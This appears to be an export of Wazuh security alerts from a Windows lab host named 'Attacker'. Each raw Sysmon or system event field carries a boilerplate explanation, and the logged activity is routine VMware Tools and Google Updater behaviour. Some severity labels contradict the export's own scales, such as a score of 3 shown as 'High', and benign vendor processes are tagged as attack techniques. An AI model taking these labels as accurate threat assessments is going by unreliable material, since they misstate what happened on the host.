No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-20 01:40:35.504 ProcessGuid: {94294ddc-5093-6804-8508-000000000e00} ProcessId: 2096 Image: C:\Windows\System32\conhost.exe FileVersion: 10.0.26100.3624 (WinBuild.160101.0800) Description: Console Window Host Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: CONHOST.EXE CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 CurrentDirectory: C:\WINDOWS User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=EDDF1F02AF16312858678F31843F1CAB05A6DF47D9BA15C0AA117F583E669D9D ParentProcessGuid: {94294ddc-5092-6804-8308-000000000e00} ParentProcessId: 13156 ParentImage: C:\Windows\System32\cmd.exe ParentCommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:40:35.504
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-5093-6804-8508-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2096
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\conhost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3624 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Console Window Host
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  CONHOST.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\WINDOWS
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=EDDF1F02AF16312858678F31843F1CAB05A6DF47D9BA15C0AA117F583E669D9D
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-5092-6804-8308-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13156
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\cmd.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Suspicious Windows cmd shell execution

🧠 What happened? Suspicious Windows cmd shell execution

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:33:41.348+0000 | 🧠 MITRE: ['Discovery', 'Execution'] – ['Account Discovery', 'Windows Command Shell'] [T1087] [T1059.003]

🚨 Severity: High

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:41.348+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Suspicious Windows cmd shell execution
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92032
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087', 'T1059.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery', 'Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery', 'Windows Command Shell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534021.574270
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:40.1776576Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  218817
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-20 01:40:40.137 ProcessGuid: {94294ddc-5098-6804-9208-000000000e00} ProcessId: 9944 Image: C:\Windows\System32\ipconfig.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: IP Configuration Utility Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: ipconfig.exe CommandLine: C:\WINDOWS\system32\ipconfig /renew CurrentDirectory: C:\Windows\System32\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=9C552FA02A37BA6EA511A7A571B1D05671CE9C5589A6E180337ADD7BC35E3D0B ParentProcessGuid: {94294ddc-5092-6804-8308-000000000e00} ParentProcessId: 13156 ParentImage: C:\Windows\System32\cmd.exe ParentCommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:40:40.137
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-5098-6804-9208-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9944
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\ipconfig.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  IP Configuration Utility
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  ipconfig.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\ipconfig /renew
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Windows\\System32\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=9C552FA02A37BA6EA511A7A571B1D05671CE9C5589A6E180337ADD7BC35E3D0B
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-5092-6804-8308-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13156
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\cmd.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

New Windows Service Created

🧠 What happened? New Windows Service Created

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:33:42.545+0000 | 🧠 MITRE: ['Persistence', 'Privilege Escalation'] – ['Windows Service'] [T1543.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1543.003

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:42.545+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New Windows Service Created
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61138
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1543.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Persistence', 'Privilege Escalation']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Service']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534022.579734
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  7045
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:32:37.8788463Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2985
Incremental log record number – handy for timeline order.

data.win.system.processID:  772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  9712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "A service was installed in the system. Service Name: Google Updater Service (GoogleUpdaterService137.0.7129.0) Service File Name: "C:\Program Files (x86)\Google\GoogleUpdater\137.0.7129.0\updater.exe" --system --windows-service --service=update Service Type: user mode service Service Start Type: auto start Service Account: LocalSystem"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.serviceName:  Google Updater Service (GoogleUpdaterService137.0.7129.0)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.imagePath:  \"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7129.0\\updater.exe\" --system --windows-service --service=update
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.serviceType:  user mode service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.startType:  auto start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.accountName:  LocalSystem
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:33:59.203+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:59.203+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534039.582303
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  16384
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:32:48.8829916Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2398
Incremental log record number – handy for timeline order.

data.win.system.processID:  7908
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:31:48Z. Reason: RulesEngine."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  2025-04-25T22:31:48Z, RulesEngine
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:34:13.522+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:13.522+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534053.583882
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:58.6481860Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  225059
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:40:58.647 ProcessGuid: {94294ddc-50a3-6804-9f08-000000000e00} ProcessId: 12284 Image: C:\Program Files (x86)\Google\GoogleUpdater\137.0.7115.0\updater.exe TargetFilename: C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping12284_1175179416\UpdaterSetup.exe CreationUtcTime: 2025-04-20 01:40:58.647 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:40:58.647
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-50a3-6804-9f08-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12284
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7115.0\\updater.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\SystemTemp\\chrome_Unpacker_BeginUnzipping12284_1175179416\\UpdaterSetup.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:40:58.647
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  6
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:34:14.131+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:14.131+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534054.586712
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:59.0804559Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  225097
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:40:59.072 ProcessGuid: {94294ddc-50aa-6804-b308-000000000e00} ProcessId: 10268 Image: C:\WINDOWS\SystemTemp\chrome_Unpacker_BeginUnzipping12284_1175179416\UpdaterSetup.exe TargetFilename: C:\Windows\SystemTemp\Google10268_165626352\bin\uninstall.cmd CreationUtcTime: 2025-04-20 01:40:59.072 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:40:59.072
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-50aa-6804-b308-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10268
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

